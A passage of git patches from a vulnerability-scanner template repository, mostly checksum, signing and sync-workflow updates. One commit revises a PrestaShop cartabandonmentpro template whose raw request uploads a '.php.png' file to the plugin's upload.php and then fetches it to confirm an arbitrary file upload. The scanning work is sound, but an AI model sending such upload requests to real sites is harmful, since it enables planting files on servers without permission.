http/cves/2015/CVE-2015-4668.yaml:2b4888f257c6dc0cba9ee277c343475ea06da19f @@ -1667,6 +1668,7 @@ http/cves/2019/CVE-2019-6340.yaml:c0e85bf4c7d5a44b6a2288baf33daa21966dc5c3 http/cves/2019/CVE-2019-6715.yaml:3e335ffc1bb0e3d32a7755cbeb02535407298af7 http/cves/2019/CVE-2019-6799.yaml:86e0107a33657c4a446eae5ee6544633801be073 http/cves/2019/CVE-2019-6802.yaml:04678947a8f58198df25d0b489029618cca2caff +http/cves/2019/CVE-2019-7139.yaml:2ef975d9dbfb65fb7a9289021d1a1f77ddd027c8 http/cves/2019/CVE-2019-7192.yaml:40ab1445f19dcd09322617d418a9612eea02bac9 http/cves/2019/CVE-2019-7219.yaml:6372986a8f04b8ace9c02f4973e0ee15ee51e08a http/cves/2019/CVE-2019-7238.yaml:78115715b771474b691df0757ad350bd6dac77ca @@ -2970,6 +2972,7 @@ http/cves/2023/CVE-2023-2648.yaml:41ec7f7a05226cc4b5805c7b3018d5d492f21343 http/cves/2023/CVE-2023-26842.yaml:a8e888fe71856500458f993a7623c95a5acf2d34 http/cves/2023/CVE-2023-26843.yaml:a29e22aabb4f3c623854b0e2f79c6aaba42bd323 http/cves/2023/CVE-2023-27008.yaml:99b72f80285fcea1ca809221940b6dd32a511432 +http/cves/2023/CVE-2023-27032.yaml:569883b322e6b36ef24b11f933606e18af2054e7 http/cves/2023/CVE-2023-27034.yaml:e2c1ce7882a10ef1b7e9126950304588d00ff267 http/cves/2023/CVE-2023-27159.yaml:2687d77e90b419ac3a52ddc4e837eeb6135a6da6 http/cves/2023/CVE-2023-27179.yaml:37e8c6b241909fc9025935c171317ee092f9b206 @@ -3157,6 +3160,7 @@ http/cves/2023/CVE-2023-4415.yaml:21b79187558e4d88b2c453cfe6c99cc13c84fccb http/cves/2023/CVE-2023-44352.yaml:838f6b730d02b9335f6e41cfa6f1e28ab7c3828e http/cves/2023/CVE-2023-44353.yaml:34be9ca42f557484dff5d8434d1e34b192299eb3 http/cves/2023/CVE-2023-4451.yaml:3201ce3e57a6ef644539ab1fcc4a1d0e37f8b542 +http/cves/2023/CVE-2023-45375.yaml:71f879df292b115cb50e0d46bba5304adde0164f http/cves/2023/CVE-2023-4547.yaml:a6e77eeb6c623c0317df91820a3523b09d8b05d5 http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2 http/cves/2023/CVE-2023-45671.yaml:dd4754dca2d4d037d911c6a7200d2a83cd81bbcf @@ -3164,6 +3168,7 @@ http/cves/2023/CVE-2023-4568.yaml:b55a87816a7145a42fa228dfe704da4572d5044e http/cves/2023/CVE-2023-45852.yaml:121fe7235b0b17c24564aabf8701636466e6c686 http/cves/2023/CVE-2023-4596.yaml:2f579cfedfcc066453d4d03b303efa1505fcc2cb http/cves/2023/CVE-2023-4634.yaml:a27a590c0501711f8c63e214ca7d76c1b3e7bef1 +http/cves/2023/CVE-2023-46347.yaml:51189c058d3008300fc9e7e5e5342c13a3c52f08 http/cves/2023/CVE-2023-46359.yaml:2c5eadff5358c49c151934a282621b2bfce3bf92 http/cves/2023/CVE-2023-46574.yaml:3ee23f056a218c79387d3ae1c3cdbb51aeba5191 http/cves/2023/CVE-2023-46747.yaml:b010f6e5c18a3f337a7f2e266f9330a39635d36c @@ -7499,7 +7504,7 @@ http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml:d2ccf2e6f610a31f1503ed30b074a http/vulnerabilities/jenkins/jenkins-asyncpeople.yaml:28dbb6ff09c477f85b9bb63b572ece60d1f6da94 http/vulnerabilities/jenkins/jenkins-script.yaml:d557e9f184eed10b1f1c9d2769ce17b9873bf47f http/vulnerabilities/jenkins/jenkins-stack-trace.yaml:7ebe9434bb86753e39e131e4e69d1f79b279179a -http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml:e2a23ad010cccf8daa99271e513b040dc774fb90 +http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml:3f864ee1d304a4ea47e603be73b0b193d3764a28 http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml:5864d5ddbf7bb775957f9af2c354e278b135e888 http/vulnerabilities/jinhe/jinhe-oa-c6-lfi.yaml:ddb4e69fa2143bf694f57a117f26e02f9a0b3db5 http/vulnerabilities/jira/jira-servicedesk-signup.yaml:d3ad2f1c3e763757dfc43f44463017a99f5afed4 @@ -7890,6 +7895,7 @@ http/vulnerabilities/phpmyadmin-unauth.yaml:d15ef415782dbc76f48b70d10f1520819b28 http/vulnerabilities/portainer-init-deploy.yaml:93713c9e50dea4da7a387e9be325229a914eb433 http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml:1dde1d96626b10652831b3222e3f38f3c894fce4 http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml:e412881f521a4d5d350da2f825540251c38aabed +http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml:b3432c500bd64aad8ddd86131d387b72072d7995 http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml:b4125e258896dd6b614f98e0443fdba778b4ca1a http/vulnerabilities/qibocms-file-download.yaml:c5c1fb9a39ad1d8ac93a8163154bb2887ddf150d http/vulnerabilities/rails/rails6-xss.yaml:b28fc53f49e6d7a89c50a3da233570d3b05199a4 @@ -7968,6 +7974,7 @@ http/vulnerabilities/ueditor/ueditor-xss.yaml:222e1f2da270e70eb6a8c9a9b57ba955b9 http/vulnerabilities/vbulletin/arcade-php-sqli.yaml:3aefc2073f08e855dec0c8146b728b692ce654f2 http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml:5e3cb2ac4a3259c35592098294ad49ef31b87efe http/vulnerabilities/vbulletin/vbulletin-backdoor.yaml:5565f8dcc7d5ad169422fd7e698c0399f79ab961 +http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml:5558d76901f213962bd7f01d6cf7e3727d2d8d45 http/vulnerabilities/videoxpert-lfi.yaml:1aa4c4a1048489e9343348c0e436a2917c4edcf9 http/vulnerabilities/vmware/vmware-cloud-xss.yaml:4afa16c86c0394c6134840c2745657758b78e063 http/vulnerabilities/vmware/vmware-hcx-log4j.yaml:73321afec891e37709b54301889f4d0fddf26e1e @@ -8464,7 +8471,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:465db5a1c190e3d2a9013cbf9d8ea06794949928 +templates-checksum.txt:7f90c56db5079ad048c6f60b530490ecae2197b1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 54b5fd10cb92a41bca3fa7d7700e6c45514ef45f Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Fri, 3 May 2024 05:49:09 +0000 Subject: [PATCH 0531/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index be0b53883f..994c567095 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,14 +3,19 @@ on: push: paths: - '.new-additions' + - 'http/cves/2015/CVE-2015-4455.yaml' + - 'http/cves/2019/CVE-2019-7139.yaml' - 'http/cves/2023/CVE-2023-1892.yaml' - 'http/cves/2023/CVE-2023-2227.yaml' + - 'http/cves/2023/CVE-2023-27032.yaml' - 'http/cves/2023/CVE-2023-2948.yaml' - 'http/cves/2023/CVE-2023-2949.yaml' - 'http/cves/2023/CVE-2023-31446.yaml' - 'http/cves/2023/CVE-2023-32077.yaml' - 'http/cves/2023/CVE-2023-38964.yaml' - 'http/cves/2023/CVE-2023-43208.yaml' + - 'http/cves/2023/CVE-2023-45375.yaml' + - 'http/cves/2023/CVE-2023-46347.yaml' - 'http/cves/2023/CVE-2023-4973.yaml' - 'http/cves/2024/CVE-2024-0235.yaml' - 'http/cves/2024/CVE-2024-1183.yaml' @@ -34,7 +39,9 @@ on: - 'http/misconfiguration/installer/eyoucms-installer.yaml' - 'http/misconfiguration/installer/sabnzbd-installer.yaml' - 'http/misconfiguration/titannit-web-exposure.yaml' + - 'http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml' - 'http/vulnerabilities/titan/titannit-web-rce.yaml' + - 'http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml' - 'network/detection/aix-websm-detect.yaml' - 'network/detection/bluecoat-telnet-proxy-detect.yaml' workflow_dispatch: From b9165b3ec89a80aa9a9e6162aa0f908dd3728834 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 3 May 2024 05:50:08 +0000 Subject: [PATCH 0532/1768] Auto Template Signing [Fri May 3 05:50:08 UTC 2024] :robot: --- http/cves/2015/CVE-2015-4455.yaml | 1 + http/cves/2019/CVE-2019-7139.yaml | 1 + http/cves/2023/CVE-2023-27032.yaml | 1 + http/cves/2023/CVE-2023-45375.yaml | 3 ++- http/cves/2023/CVE-2023-46347.yaml | 1 + .../prestashop/prestashop-cartabandonmentpro-file-upload.yaml | 1 + http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml | 1 + 7 files changed, 8 insertions(+), 1 deletion(-) diff --git a/http/cves/2015/CVE-2015-4455.yaml b/http/cves/2015/CVE-2015-4455.yaml index 0e318a76ac..39485d2025 100644 --- a/http/cves/2015/CVE-2015-4455.yaml +++ b/http/cves/2015/CVE-2015-4455.yaml @@ -66,3 +66,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "uploaded_filename\":\"{{filename}}.jpg")' condition: and +# digest: 4b0a0048304602210086997acf11c57218a01b0591b45c9e1e9e0171e8f12c848b7e95c91d35edf190022100973637bca29c3c89a004d205adfe81cc82708d8f58f0d0702faed7113ffcf973:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7139.yaml b/http/cves/2019/CVE-2019-7139.yaml index 16fe9a89a3..bb8ecfc9e5 100644 --- a/http/cves/2019/CVE-2019-7139.yaml +++ b/http/cves/2019/CVE-2019-7139.yaml @@ -67,3 +67,4 @@ http: - 'status_code_3 == 200 && status_code_4 == 400' - 'len(body_3) == 2 && len(body_4) == 2' condition: and +# digest: 490a0046304402200eea406b4dd10703c590fb378ef5037c6dd0f56ba1b1059e66e8105bca0f38f7022021af5ceb6e9087fbafeb243ba19617bd9e3e9aaff723ebd4fea7892cee66428d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-27032.yaml b/http/cves/2023/CVE-2023-27032.yaml index 1107170e50..a2441f835d 100644 --- a/http/cves/2023/CVE-2023-27032.yaml +++ b/http/cves/2023/CVE-2023-27032.yaml @@ -63,3 +63,4 @@ http: regex: - ',"static_token":"([0-9a-z]+)",' internal: true +# digest: 4a0a00473045022100aa46ba83eaa1e937eb89a6c4296e4efd072af40a4bcf8e687f6f3ea2551ed66502204452a505bdad3d329e7fdb44f2aa4ad0a0be98e174650aed8a5f057d51935856:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45375.yaml b/http/cves/2023/CVE-2023-45375.yaml index 40e954c236..49fad0f912 100644 --- a/http/cves/2023/CVE-2023-45375.yaml +++ b/http/cves/2023/CVE-2023-45375.yaml @@ -56,4 +56,5 @@ http: - duration>=6 - status_code == 302 - contains(content_type, "text/html") - condition: and \ No newline at end of file + condition: and +# digest: 4a0a0047304502207f826adf0d940782fb53c8bc4a06f53a4735b9231586bf8c8b26306e06b521b0022100ebe60a3c7c67085fab3cb503a91f7b59e5bb9148ae8ec4682025a107d73c1285:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index 90a53e492f..98e29cd420 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -43,3 +43,4 @@ http: - contains(content_type, "text/html") - contains(header, 'PrestaShop') condition: and +# digest: 4b0a00483046022100b87838fd7d263c207e34f1457465b2f00642af421684161d37081d4b8ad0413b022100f379548beef0caf23301dc7d71e0a9d46c803654f1815f49a1c4d8838bc7761e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml b/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml index c526d7f210..16e93bfa59 100644 --- a/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml +++ b/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml @@ -55,3 +55,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402206cd9c0818aa36d2324bdd68ea91572b784f5d8ba039eb80723118081997fb883022072073af9c96011fb764121a837e5d489c22d27efd3498085aab2a9269088c147:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml b/http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml index 3ba2fdfd60..21ef067826 100644 --- a/http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml +++ b/http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml @@ -39,3 +39,4 @@ http: - 200 - 503 condition: or +# digest: 4b0a0048304602210084dd0d783afb78cfa19cc10f84030918f06fe86708e84bc6d5bfdf4ced8fe10c02210094a54b19eb0bb0c4c16160977a3be435769921093900186566c64fa372caafdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a853bf3e0c169cc6db969d04c2778b371fc5af44 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Fri, 3 May 2024 05:53:09 +0000 Subject: [PATCH 0533/1768] Auto Generated New Template Addition List [Fri May 3 05:53:09 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 62fea9d767..cd04ef4a59 100644 --- a/.new-additions +++ b/.new-additions @@ -12,6 +12,7 @@ http/cves/2023/CVE-2023-43208.yaml http/cves/2023/CVE-2023-45375.yaml http/cves/2023/CVE-2023-46347.yaml http/cves/2023/CVE-2023-4973.yaml +http/cves/2023/CVE-2023-5003.yaml http/cves/2024/CVE-2024-0235.yaml http/cves/2024/CVE-2024-1183.yaml http/cves/2024/CVE-2024-23917.yaml From 021581484b55b81fd8810f5c65c307e69d1aa2d3 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 3 May 2024 05:53:20 +0000 Subject: [PATCH 0534/1768] Auto Generated Templates Checksum [Fri May 3 05:53:20 UTC 2024] :robot: --- templates-checksum.txt | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 433e944cf4..29736fe2f1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1183,7 +1183,7 @@ http/cves/2015/CVE-2015-4063.yaml:82f243448aa7204d9d610679fb10f817dbb54750 http/cves/2015/CVE-2015-4074.yaml:065fb740afd3068b6d1e46df88070d26b6ce45e0 http/cves/2015/CVE-2015-4127.yaml:544be4829bf72ee7d73cc4cb7f47f3fd3f1ae01c http/cves/2015/CVE-2015-4414.yaml:d62aaf0ccbf4332dd956ee3fa625dfef380e07cd -http/cves/2015/CVE-2015-4455.yaml:3ca9abe358652953c3b12c8468f92573676c4e95 +http/cves/2015/CVE-2015-4455.yaml:c9428c8c8a30af5dfb87b2b89927f3ce1ba7b554 http/cves/2015/CVE-2015-4632.yaml:d062862654959446af1cb7bdb1e5ff2ff029510e http/cves/2015/CVE-2015-4666.yaml:846d0baaf39e9f004c072d698ff122871460f68e http/cves/2015/CVE-2015-4668.yaml:2b4888f257c6dc0cba9ee277c343475ea06da19f @@ -1668,7 +1668,7 @@ http/cves/2019/CVE-2019-6340.yaml:c0e85bf4c7d5a44b6a2288baf33daa21966dc5c3 http/cves/2019/CVE-2019-6715.yaml:3e335ffc1bb0e3d32a7755cbeb02535407298af7 http/cves/2019/CVE-2019-6799.yaml:86e0107a33657c4a446eae5ee6544633801be073 http/cves/2019/CVE-2019-6802.yaml:04678947a8f58198df25d0b489029618cca2caff -http/cves/2019/CVE-2019-7139.yaml:2ef975d9dbfb65fb7a9289021d1a1f77ddd027c8 +http/cves/2019/CVE-2019-7139.yaml:9ce4e6a9da54dabf3d98d063111cc7e8d337fef7 http/cves/2019/CVE-2019-7192.yaml:40ab1445f19dcd09322617d418a9612eea02bac9 http/cves/2019/CVE-2019-7219.yaml:6372986a8f04b8ace9c02f4973e0ee15ee51e08a http/cves/2019/CVE-2019-7238.yaml:78115715b771474b691df0757ad350bd6dac77ca @@ -2972,7 +2972,7 @@ http/cves/2023/CVE-2023-2648.yaml:41ec7f7a05226cc4b5805c7b3018d5d492f21343 http/cves/2023/CVE-2023-26842.yaml:a8e888fe71856500458f993a7623c95a5acf2d34 http/cves/2023/CVE-2023-26843.yaml:a29e22aabb4f3c623854b0e2f79c6aaba42bd323 http/cves/2023/CVE-2023-27008.yaml:99b72f80285fcea1ca809221940b6dd32a511432 -http/cves/2023/CVE-2023-27032.yaml:569883b322e6b36ef24b11f933606e18af2054e7 +http/cves/2023/CVE-2023-27032.yaml:ff5f86063146df89d119061535c3d6cfa9c74474 http/cves/2023/CVE-2023-27034.yaml:e2c1ce7882a10ef1b7e9126950304588d00ff267 http/cves/2023/CVE-2023-27159.yaml:2687d77e90b419ac3a52ddc4e837eeb6135a6da6 http/cves/2023/CVE-2023-27179.yaml:37e8c6b241909fc9025935c171317ee092f9b206 @@ -3160,7 +3160,7 @@ http/cves/2023/CVE-2023-4415.yaml:21b79187558e4d88b2c453cfe6c99cc13c84fccb http/cves/2023/CVE-2023-44352.yaml:838f6b730d02b9335f6e41cfa6f1e28ab7c3828e http/cves/2023/CVE-2023-44353.yaml:34be9ca42f557484dff5d8434d1e34b192299eb3 http/cves/2023/CVE-2023-4451.yaml:3201ce3e57a6ef644539ab1fcc4a1d0e37f8b542 -http/cves/2023/CVE-2023-45375.yaml:71f879df292b115cb50e0d46bba5304adde0164f +http/cves/2023/CVE-2023-45375.yaml:e9a83c1c9c55540677f50b89260a2df23d3c2c6e http/cves/2023/CVE-2023-4547.yaml:a6e77eeb6c623c0317df91820a3523b09d8b05d5 http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2 http/cves/2023/CVE-2023-45671.yaml:dd4754dca2d4d037d911c6a7200d2a83cd81bbcf @@ -3168,7 +3168,7 @@ http/cves/2023/CVE-2023-4568.yaml:b55a87816a7145a42fa228dfe704da4572d5044e http/cves/2023/CVE-2023-45852.yaml:121fe7235b0b17c24564aabf8701636466e6c686 http/cves/2023/CVE-2023-4596.yaml:2f579cfedfcc066453d4d03b303efa1505fcc2cb http/cves/2023/CVE-2023-4634.yaml:a27a590c0501711f8c63e214ca7d76c1b3e7bef1 -http/cves/2023/CVE-2023-46347.yaml:51189c058d3008300fc9e7e5e5342c13a3c52f08 +http/cves/2023/CVE-2023-46347.yaml:78b9ee5474f96b6390c07647e986fe9bc0ab2e96 http/cves/2023/CVE-2023-46359.yaml:2c5eadff5358c49c151934a282621b2bfce3bf92 http/cves/2023/CVE-2023-46574.yaml:3ee23f056a218c79387d3ae1c3cdbb51aeba5191 http/cves/2023/CVE-2023-46747.yaml:b010f6e5c18a3f337a7f2e266f9330a39635d36c @@ -3187,6 +3187,7 @@ http/cves/2023/CVE-2023-4966.yaml:14102dfbda787ccbbd24875179e48acbdae04643 http/cves/2023/CVE-2023-4973.yaml:fd42b4708183812b84a950edadb28cd74acf7664 http/cves/2023/CVE-2023-4974.yaml:d7a5386c5971e13babc28e9f346991ef0e82fba2 http/cves/2023/CVE-2023-49785.yaml:37c94b4ef0f6b07d703d372d1e5a0841e9a3184e +http/cves/2023/CVE-2023-5003.yaml:941ef113363f00a6c90a7a8566d92df2ad436b30 http/cves/2023/CVE-2023-50290.yaml:993704655d9bb469f8ea073c9757676b3ee1468f http/cves/2023/CVE-2023-5074.yaml:7b27fc2c3a6ecd3375ca4faf384c14cc480f859c http/cves/2023/CVE-2023-5089.yaml:143e9400b53b44e4fca7cdd97d47add25ac940b6 @@ -7895,7 +7896,7 @@ http/vulnerabilities/phpmyadmin-unauth.yaml:d15ef415782dbc76f48b70d10f1520819b28 http/vulnerabilities/portainer-init-deploy.yaml:93713c9e50dea4da7a387e9be325229a914eb433 http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml:1dde1d96626b10652831b3222e3f38f3c894fce4 http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml:e412881f521a4d5d350da2f825540251c38aabed -http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml:b3432c500bd64aad8ddd86131d387b72072d7995 +http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml:3bad9d5ecfe44f66c2e5627d3d166ae255eb7927 http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml:b4125e258896dd6b614f98e0443fdba778b4ca1a http/vulnerabilities/qibocms-file-download.yaml:c5c1fb9a39ad1d8ac93a8163154bb2887ddf150d http/vulnerabilities/rails/rails6-xss.yaml:b28fc53f49e6d7a89c50a3da233570d3b05199a4 @@ -7974,7 +7975,7 @@ http/vulnerabilities/ueditor/ueditor-xss.yaml:222e1f2da270e70eb6a8c9a9b57ba955b9 http/vulnerabilities/vbulletin/arcade-php-sqli.yaml:3aefc2073f08e855dec0c8146b728b692ce654f2 http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml:5e3cb2ac4a3259c35592098294ad49ef31b87efe http/vulnerabilities/vbulletin/vbulletin-backdoor.yaml:5565f8dcc7d5ad169422fd7e698c0399f79ab961 -http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml:5558d76901f213962bd7f01d6cf7e3727d2d8d45 +http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml:286dda2cca7b4e62e4c1a76eed1c5dfcf7d6495d http/vulnerabilities/videoxpert-lfi.yaml:1aa4c4a1048489e9343348c0e436a2917c4edcf9 http/vulnerabilities/vmware/vmware-cloud-xss.yaml:4afa16c86c0394c6134840c2745657758b78e063 http/vulnerabilities/vmware/vmware-hcx-log4j.yaml:73321afec891e37709b54301889f4d0fddf26e1e @@ -8471,7 +8472,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7f90c56db5079ad048c6f60b530490ecae2197b1 +templates-checksum.txt:62659721a9f26994d94deebefa7c96ff8237fdfb wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4f90ce066fe0f54e81ce9f422ba02e8b5ec15eb5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Fri, 3 May 2024 05:54:02 +0000 Subject: [PATCH 0535/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 994c567095..0a317a8efd 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -17,6 +17,7 @@ on: - 'http/cves/2023/CVE-2023-45375.yaml' - 'http/cves/2023/CVE-2023-46347.yaml' - 'http/cves/2023/CVE-2023-4973.yaml' + - 'http/cves/2023/CVE-2023-5003.yaml' - 'http/cves/2024/CVE-2024-0235.yaml' - 'http/cves/2024/CVE-2024-1183.yaml' - 'http/cves/2024/CVE-2024-23917.yaml' From f66e27e1d11198b482db83d0b3c8e98309fa923f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 3 May 2024 05:55:04 +0000 Subject: [PATCH 0536/1768] Auto Template Signing [Fri May 3 05:55:04 UTC 2024] :robot: --- http/cves/2023/CVE-2023-5003.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-5003.yaml b/http/cves/2023/CVE-2023-5003.yaml index 296e6eb9cf..37f74e205f 100644 --- a/http/cves/2023/CVE-2023-5003.yaml +++ b/http/cves/2023/CVE-2023-5003.yaml @@ -43,3 +43,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100bd156a20bbfa2b8fcbab364a68192646c450da886c638558ab7c88166483aa44022100d58dac4f441a368fc420c322d67aef9bfeecadc03665b62bf18dc363f7421566:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f1c8aaf194ca0bba15821efe2d2e17b06e170566 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 3 May 2024 13:12:25 +0530 Subject: [PATCH 0537/1768] fix-fp --- ...tashop-cartabandonmentpro-file-upload.yaml | 30 +++++++------------ 1 file changed, 11 insertions(+), 19 deletions(-) diff --git a/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml b/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml index 16e93bfa59..28b47529ae 100644 --- a/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml +++ b/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml @@ -18,11 +18,10 @@ variables: filename: '{{rand_base(7, "abc")}}' title: '{{rand_base(7, "abc")}}' - http: - raw: - | - POST /modules/{{paths}}/upload.php HTTP/1.1 + POST /modules/cartabandonmentpro/upload.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=xYzZY @@ -36,23 +35,16 @@ http: --xYzZY-- - payloads: - paths: - - 'cartabandonmentpro' - - 'cartabandonmentproOld' + - | + GET /modules/cartabandonmentpro/uploads/{{filename}}.php.png HTTP/1.1 + Host: {{Hostname}} - stop-at-first-match: true - host-redirects: true - max-redirects: 3 - - matchers-condition: and matchers: - - type: word - part: body - words: - - "{{filename}}.php.png" + - type: dsl + dsl: + - 'contains(header_2, "image/png")' + - 'contains(body_1, "{{filename}}.php.png")' + - 'status_code_1 == 200 && status_code_2 == 200' + condition: and - - type: status - status: - - 200 -# digest: 490a0046304402206cd9c0818aa36d2324bdd68ea91572b784f5d8ba039eb80723118081997fb883022072073af9c96011fb764121a837e5d489c22d27efd3498085aab2a9269088c147:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206cd9c0818aa36d2324bdd68ea91572b784f5d8ba039eb80723118081997fb883022072073af9c96011fb764121a837e5d489c22d27efd3498085aab2a9269088c147:922c64590222798bb761d5b6d8e72950 From b92fdc4912766d69e58b36233eda968eba4ad7ec Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 3 May 2024 08:30:40 +0000 Subject: [PATCH 0539/1768] Auto Generated Templates Checksum [Fri May 3 08:30:40 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 29736fe2f1..62573315fb 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3187,7 +3187,7 @@ http/cves/2023/CVE-2023-4966.yaml:14102dfbda787ccbbd24875179e48acbdae04643 http/cves/2023/CVE-2023-4973.yaml:fd42b4708183812b84a950edadb28cd74acf7664 http/cves/2023/CVE-2023-4974.yaml:d7a5386c5971e13babc28e9f346991ef0e82fba2 http/cves/2023/CVE-2023-49785.yaml:37c94b4ef0f6b07d703d372d1e5a0841e9a3184e -http/cves/2023/CVE-2023-5003.yaml:941ef113363f00a6c90a7a8566d92df2ad436b30 +http/cves/2023/CVE-2023-5003.yaml:f7da2dff91d97d8c63abb7faf35019a0bb73906a http/cves/2023/CVE-2023-50290.yaml:993704655d9bb469f8ea073c9757676b3ee1468f http/cves/2023/CVE-2023-5074.yaml:7b27fc2c3a6ecd3375ca4faf384c14cc480f859c http/cves/2023/CVE-2023-5089.yaml:143e9400b53b44e4fca7cdd97d47add25ac940b6 @@ -7896,7 +7896,7 @@ http/vulnerabilities/phpmyadmin-unauth.yaml:d15ef415782dbc76f48b70d10f1520819b28 http/vulnerabilities/portainer-init-deploy.yaml:93713c9e50dea4da7a387e9be325229a914eb433 http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml:1dde1d96626b10652831b3222e3f38f3c894fce4 http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml:e412881f521a4d5d350da2f825540251c38aabed -http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml:3bad9d5ecfe44f66c2e5627d3d166ae255eb7927 +http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml:d527e7072bcb76a31afb3f9709603002a73bd00a 